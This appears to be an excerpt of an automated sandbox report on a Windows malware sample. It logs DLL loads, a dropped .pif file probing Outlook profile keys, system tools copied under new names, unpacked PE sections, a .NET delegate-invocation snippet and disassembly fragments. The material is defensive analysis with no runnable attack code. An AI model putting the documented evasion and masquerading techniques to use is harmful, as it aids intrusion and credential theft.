            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\Public\Libraries\yihfsboC.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: EPTMAcgvNZ.exe Static file information: File size 1297920 > 1048576
            Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdb source: EPTMAcgvNZ.exe, EPTMAcgvNZ.exe, 00000000.00000002.1396601704.0000000020840000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1355304078.0000000002326000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1396601704.00000000207F0000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1252312705.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000001160000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: _.pdb source: yihfsboC.pif, 0000000E.00000003.1357241369.0000000024219000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2540746609.0000000027061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2535779078.0000000025D2B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, yihfsboC.pif, 00000017.00000003.1465818240.00000000327BE000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2540455156.000000003429B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2546648768.0000000035951000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2532622056.000000002859B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2537622019.0000000029911000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000003.1551837223.00000000268CE000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: cmd.pdbUGP source: esentutl.exe, 0000000B.00000003.1343597918.0000000005650000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000010.00000002.1408812461.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000012.00000000.1420522255.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000013.00000002.1534376052.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001B.00000002.1582953816.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001C.00000002.1619637523.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1624785769.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif.11.dr
            Source: Binary string: ping.pdbGCTL source: esentutl.exe, 0000000F.00000003.1355379307.0000000005960000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000014.00000002.1533195513.0000000000381000.00000020.00000001.01000000.0000000B.sdmp, xpha.pif.15.dr
            Source: Binary string: easinvoker.pdbH source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdbGCTL source: EPTMAcgvNZ.exe, 00000000.00000002.1396601704.0000000020840000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1347686581.00000000217CE000.00000004.00000020.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1347686581.000000002179D000.00000004.00000020.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1355304078.0000000002326000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1396601704.00000000207F0000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1252312705.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000001160000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 00000013.00000002.1534376052.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001B.00000002.1582953816.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001C.00000002.1619637523.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1624785769.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif.11.dr
            Source: Binary string: ping.pdb source: esentutl.exe, 0000000F.00000003.1355379307.0000000005960000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000014.00000002.1533195513.0000000000381000.00000020.00000001.01000000.0000000B.sdmp, xpha.pif.15.dr

            Data Obfuscation

            Source: C:\Users\Public\Libraries\yihfsboC.pifUnpacked PE file: 14.2.yihfsboC.pif.400000.5.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\Public\Libraries\yihfsboC.pifUnpacked PE file: 23.2.yihfsboC.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\Public\Libraries\yihfsboC.pifUnpacked PE file: 26.2.yihfsboC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\Public\Libraries\yihfsboC.pifUnpacked PE file: 14.2.yihfsboC.pif.400000.5.unpack
            Source: C:\Users\Public\Libraries\yihfsboC.pifUnpacked PE file: 23.2.yihfsboC.pif.400000.1.unpack
            Source: C:\Users\Public\Libraries\yihfsboC.pifUnpacked PE file: 26.2.yihfsboC.pif.400000.0.unpack
            Source: Yara matchFile source: 0.2.EPTMAcgvNZ.exe.2b10000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.EPTMAcgvNZ.exe.23265a8.1.unpack, type: UNPACKEDPE
            Source: 14.2.yihfsboC.pif.27066478.12.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 14.2.yihfsboC.pif.285a0f08.13.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 14.2.yihfsboC.pif.25d6c896.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 14.2.yihfsboC.pif.28be0000.15.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 14.3.yihfsboC.pif.24219998.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 14.2.yihfsboC.pif.2709e790.10.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: yihfsboC.pif.0.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02B2894C
            Source: alpha.pif.11.drStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B3D2FC push 02B3D367h; ret 0_2_02B3D35F
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B163B0 push 02B1640Bh; ret 0_2_02B16403
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B163AE push 02B1640Bh; ret 0_2_02B16403
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B1332C push eax; ret 0_2_02B13368
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B3C378 push 02B3C56Eh; ret 0_2_02B3C566
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B1C349 push 8B02B1C1h; ret 0_2_02B1C34E
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B3D0AC push 02B3D125h; ret 0_2_02B3D11D
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2306B push 02B230B9h; ret 0_2_02B230B1
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2306C push 02B230B9h; ret 0_2_02B230B1
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B3D1F8 push 02B3D288h; ret 0_2_02B3D280
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2F108 push ecx; mov dword ptr [esp], edx0_2_02B2F10D
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B3D144 push 02B3D1ECh; ret 0_2_02B3D1E4
